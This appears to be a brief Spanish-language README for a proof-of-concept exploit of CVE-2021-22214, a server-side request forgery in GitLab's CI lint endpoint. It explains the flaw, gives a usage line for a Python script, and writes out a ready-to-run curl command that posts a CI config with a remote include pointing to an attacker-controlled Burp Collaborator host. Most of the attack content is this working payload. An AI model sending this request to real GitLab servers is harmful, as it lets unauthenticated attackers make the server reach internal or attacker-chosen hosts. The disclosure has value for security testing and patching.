
Prueba de concepto del exploit para CVE-2021-22214, una falsificación de solicitud del lado del servidor en los webhooks de GitLab, que permite a atacantes no autenticados realizar solicitudes HTTP internas.
POC para CVE-2021-22214: SSRF en Gitlab
La instalación remota de GitLab contiene una vulnerabilidad de falsificación de solicitudes del lado del servidor (SSRF) como resultado de que la red interna para webhooks está habilitada. Un atacante remoto no autenticado puede explotar una instancia de GitLab con registro limitado, lo que provoca que realice solicitudes HTTP a un dominio arbitrario elegido por el atacante.
usage: python3 GitLab_SSRF.py <target> <burp_collaborator_url>
curl -s –show-error -H 'Content-Type: application/json' https://TargetIP/api/v4/ci/lint –data '{ "include_merged_yaml": true, "content": "include:\n remote: http://Burp-Collaborator/test.yml"}'